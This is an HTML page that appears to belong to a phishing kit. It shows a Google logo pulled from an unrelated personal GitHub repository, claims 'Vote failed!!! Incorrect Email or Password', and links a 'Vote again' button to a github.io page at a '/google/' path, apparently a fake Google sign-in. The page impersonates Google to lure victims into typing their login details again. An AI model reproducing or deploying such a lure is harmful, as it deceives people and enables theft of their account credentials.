<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <style>
        body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    background-color: #f4f4f4;
}

.container {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    height: 50vh;
    width: 80vw;
    margin: 50px auto;
    background-color: #f4f4f4;
    box-shadow: 0 0px 0px rgba(0, 0, 0, 0.1);
}

.logo {
    margin-bottom: 20px;
}

.text {
    margin-bottom: 20px;
    text-align: center;
}

.button {
    margin-bottom: 5px;
    display: inline-block;
    padding: 10px 20px;
    background-color: #007bff;
    color: #fff;
    text-decoration: none;
    border-radius: 15px;
}
    </style>
</head>
<body>
    <div class="container">
        <img src="https://raw.githubusercontent.com/Taylor-Swift1989/photo3/a300010b118eba7ed2d8100772e712ec6aba0fe8/googlelogo_color_150x54dp.png" alt="" class="logo" style="height: 25%; width: 140px;">
        <p class="text">Vote failed!!! Incorrect Email or Password</p>
        <a href="https://indian-art.github.io/google/" class="button">Vote again</a>
    </div>
</body>
</html>
